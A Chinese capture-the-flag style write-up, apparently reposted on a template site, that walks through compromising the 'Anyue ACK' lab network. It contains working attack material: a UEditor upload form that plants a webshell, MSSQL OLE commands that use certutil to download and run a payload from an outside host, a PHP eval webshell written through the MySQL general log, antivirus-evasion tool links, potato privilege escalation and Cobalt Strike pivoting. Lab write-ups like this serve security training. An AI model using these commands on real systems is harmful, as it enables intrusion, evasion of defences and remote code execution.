暗月ACK靶场 WP

这篇具有很好参考价值的文章主要介绍了暗月ACK靶场 WP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境搭建

https://mp.weixin.qq.com/s/VB4elHdrHNCmPDP_ktcLRg

https://www.bilibili.com/video/BV1264y187St?spm_id_from=333.1007.top_right_bar_window_history.content.click

按照文章拓扑根据实际情况搭建好,web2的其中一个网卡需要自己调一下ip

暗月靶场,渗透测试,安全

1、把 12server-web1 中 C:Hws.com/Hws/HostMaster/wwwroot/www.ackmoon.com/web/HdhApp.config 的 ip 地址换成 12server-data1 的地址

2、攻击机绑定host文件,192.168.59.130 ackmoon.com

挑战开始

任务:拿到五个主机权限

信息搜集

暗月靶场,渗透测试,安全

开了一些端口,先看web服务,是一个HDH网站管理系统(HDHCMS),查看历史漏洞没有发现有用的,访问其他的的web服务也没发现,只能使劲撸这个cms了

暗月靶场,渗透测试,安全

后台路径:http://ackmoon.com/admin/login.aspx,爆破之后没发现弱口令,但是可以自己注册用户

暗月靶场,渗透测试,安全

登录发现一些信息,物理路径、数据库、上传目录、编辑器

暗月靶场,渗透测试,安全

Ueditor漏洞利用

Ueditor 1.4.3有个文件上传漏洞,具体操作如下:

使用冰蝎和一张图片制作图片马

暗月靶场,渗透测试,安全

本地写一个上传木马的脚本

<form action="http://ackmoon.com/admin/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

将图片马上传到服务器上,开启http服务,木马的路径为 http://1.12.x.x/ok.png?.aspx,点击上传会返回shell的地址

暗月靶场,渗透测试,安全暗月靶场,渗透测试,安全

使用冰蝎连接,查看权限后发现权限很低,得用cs进行提权才能找flag等操作

暗月靶场,渗透测试,安全

暗月靶场,渗透测试,安全

CS提权横向

./teamserver 1.12.x.x 123456   客户端填好服务器地址和密码连接即可

上传的马执行直接没,猜测应该是360杀掉了,登录靶机一看好家伙,全给我删了。就连powershell执行都被拦截了

暗月靶场,渗透测试,安全

继续研究了几天发现之前的掩日已经绕不过360,只能找别的办法,后面在github上找了几个Bypass的cs插件,发现其中一个可以绕过360的检测,地址为 https://github.com/cseroad/bypassAV。(后续补充一下免杀的学习内容)

按作者的使用教程生成木马,冰蝎占用内存较大(当你的电脑开着几个虚拟机和应用时内存会不够用)执行命令有时候会失败,所以新增了一个aspx一句话用蚁剑连接。将木马上传到 C:/Windows/Temp 目录下,其他目录因为权限问题可能上传不了。蚁剑执行木马,360也没有拦截的记录,成功在cs获得shell。

暗月靶场,渗透测试,安全

接下来就是提权,推荐插件 https://github.com/d3ckx1/OLa,内集成多个提权插件,用烂土豆(Rotten Potato) MS16-075成功提权到SYSTEM权限

暗月靶场,渗透测试,安全

一般来说得到SYSTEM权限可以看看主机有没有开启3389,新增一个用户登录就行,但是这个靶机没有开启,利用这个靶机当作跳板进行内网渗透即可。

查看网卡信息可知主机为双网卡,我们现在处于192.168.59.1/24这个网段,下一个网段是192.168.22.1/24,需要在此网段寻找其他的机子。

暗月靶场,渗透测试,安全

查看主机的arp表可以获取处于同一网段的主机,发现了192.168.22.129、133两个主机,使用该主机也都ping通,存活状态

暗月靶场,渗透测试,安全

之前在蚁剑中查看数据库文件的时候看到过133的主机ip,也就是说改站点和133的主机是站库分离,133专门运行数据库,为sqlserver。账号密码为:sa:pass123@.com

暗月靶场,渗透测试,安全

添加socks代理进入内网,ip为cs服务端的ip,端口4567

暗月靶场,渗透测试,安全

mssql获取权限

本地使用Proxifier工具连接代理服务器,再使用数据库连接工具连接133的数据库,通过数据库getshell

暗月靶场,渗透测试,安全

暗月靶场,渗透测试,安全

查看xp_cmdshell的状态

exec sp_configure;

暗月靶场,渗透测试,安全

按理来说应该是关闭的,但是这里显示已经开启了,我们直接执行命令即可。原本想通过cs生成的powershell命令直接上线主机但是一直没反应,查看进程发现一个火绒再运行,登录靶机一看全被拦截了

暗月靶场,渗透测试,安全

暗月靶场,渗透测试,安全

绕过方式见:https://xz.aliyun.com/t/9265,免杀木马制作:https://github.com/xinghe0/python-shellcode-loader

#开启相应的权限
exec sp_configure 'show advanced options', 1; 
RECONFIGURE;  
exec sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

#移动sethc
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'C:\Windows\System32\certutil.exe' ,'c:\windows\temp\sethc.exe';

#下载免杀木马
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\Temp\sethc.exe -urlcache -split -f "http://1.x.x.x:4446/ob.exe" C:\Windows\Temp\ob.exe';

#运行木马
exec master..xp_cmdshell 'C:/windows/temp/ob.exe';

成功上线cs

暗月靶场,渗透测试,安全

权限太低,继续烂土豆(Rotten Potato) MS16-075提权,到这里已经拿下133的主机了,查看路由表也是发现了前面web那台arp缓存的另一台主机ip

192.168.22.129的

暗月靶场,渗透测试,安全

暗月靶场,渗透测试,安全

JWT+mysql日志getshell

使用fscan进行扫描的时候发现129运行着web服务

暗月靶场,渗透测试,安全

浏览器添加代理后访问129,访问web站点

暗月靶场,渗透测试,安全

这里考察的是jwt的攻击方式,文章见:https://mp.weixin.qq.com/s/WvVgavjJMXSZQsVFtHEOhA?vid=1688855618368326&deviceid=e41dee7e-b83b-4610-8a9a-e648ac6ca813&version=4.0.20.6020&platform=win

试了修改用户名admin重新生成x-token来替换demo用户绕过,发现这个系统校验签名。又试了将alg设置为 None 重新签名发送也失败了。只剩下了爆破密钥的方式,但是字典看了别人的解析才知道是kali里面的rockyou.txt

爆破工具:https://github.com/ticarpi/jwt_tool,密钥为:Qweasdzxc5

暗月靶场,渗透测试,安全

后面以为这个密钥是突破jwt的关键点,没想到这个靶场把这个密钥设置为http://192.168.22.129/phpmyadmin4.8.5/index.php的登录密码,感觉逻辑上有些迷。登录后就是mysql日志 getshell那一套。

暗月靶场,渗透测试,安全

#查看日志路径、开启日志、设置日志文件、写入木马
SHOW VARIABLES LIKE 'general%' 
SET GLOBAL general_log='ON' 
SET GLOBAL general_log_file='C:/phpStudy_pro/WWW/s.php' 
SELECT '<?php @eval($_POST["a"]);?>'

蚁剑连接(挂代理,后续需要和129进行交互的都要挂上代理),发现新网段,并且不出网

暗月靶场,渗透测试,安全

在cs上新建一个正向监听器并生成木马(beacon tcp)

暗月靶场,渗透测试,安全

用蚁剑上传到服务器执行,cs转发,成功获取shell

5.exe  #在服务器中执行
connect 192.168.22.129 443  #在128会话中执行

暗月靶场,渗透测试,安全

暗月靶场,渗透测试,安全

shell ipconfig /all   # 发现主机在域内,域名为ack123.com
shell ping ack123.com  #定位域控的ip为10.10.10.135

暗月靶场,渗透测试,安全

SPN利用

因环境问题没法复现,题解参考:https://blog.csdn.net/qq_38850916/article/details/124801004 的kerberost攻击部分

总结

该靶机在搭建的时候会有部分问题,不知道是不是靶机主后续又对其进行修改,但是其中的免杀、代理等内容还是很贴切实战的。自己对内网域渗透这部分了解的还不够透彻,毕竟也不是专门搞红队的,以后若有机会会多多接触。文章来源地址https://www.toymoban.com/news/detail-819027.html

到了这里,关于暗月ACK靶场 WP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透测试练习靶场汇总

    1、vulstudy https://github.com/c0ny1/vulstudy 2、vulfocus Vulfocus 官网: Document 在线演示: http://vulfocus.fofa.so/ 3、vulnrange https://github.com/wgpsec/VulnRange 1、vulnhub https://www.vulnhub.com 2、vulhub Vulhub - Docker-Compose file for vulnerability environment 3、vulnrange https://github.com/wgpsec/VulnRange 4、vulapps VulApps 18、

    2024年02月02日
    浏览(29)
  • 记一次靶场搭建与渗透测试

    通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限 环境搭建 网络拓扑 虚拟机网络配置 永恒之蓝外网打点 nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞 用msf来进行永恒之蓝漏洞的

    2024年01月23日
    浏览(42)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • 精通METASPLOIT渗透测试(第3版)自建docker靶场

    首先要感谢原书作者及国内译者(哈哈哈),书有了,但是靶场没有,给的GITHUB里也只是写payload片段,没有靶机看着确实无聊。自己动手做吧。开始是用的安装方式,但是这个无法分享。还是做成docker吧。我会做一个发一个。有些因为涉及提权,我还是按照书上建议的操作系

    2024年01月18日
    浏览(42)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(51)
  • 超细DVWA靶场搭建--(小黑栈渗透测试初级篇1)

    前言:对于渗透测试这块,最初阶段建议先学习一下前、后端知识,然后再学习一到两门语言,这样子方便后续的成为大佬做好基石。渗透测试的方向上建议先web渗透 --  APP渗透 --内网渗透,多打靶场多理解漏洞的原理和工具的利用,在学习的过程中遇到的问题多做笔记和记

    2024年01月21日
    浏览(49)
  • 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

    内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或

    2024年02月08日
    浏览(39)
  • Web安全:WebGoat || VulApps 靶场搭建( 靶场漏洞测试和练习)

    WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有 java 虚拟机的平台之上,包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、

    2024年02月12日
    浏览(52)
  • WP:靶场BBS (cute): 1.0.2

    靶场地址:https://www.vulnhub.com/entry/bbs-cute-102,567/#release 访问扫描出来的文件 使用searchsploit搜索漏洞库中包含的cutenews版本 这里可以看到 这里我们选择\\\"远程代码执行\\\" 发现此脚本不能够直接使用,然后分析了一下脚本内容,发现在脚本URL路径中,需要改动 /CuteNews 位置,将此文

    2024年02月05日
    浏览(26)
  • 安全测试前置实践2-安全渗透测试

    作者:京东物流 陈维 本文我们将以围绕系统安全质量提升为目标,讲述在 功能安全测试安全渗透测试 上实践过程。 希望通过此篇文章,帮助大家更深入、透彻地了解安全测试。 安全前置扫描主要是识别白盒漏洞、黑盒漏洞问题,针对JSRC类问题,需要通过渗透测试进行漏洞

    2023年04月13日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包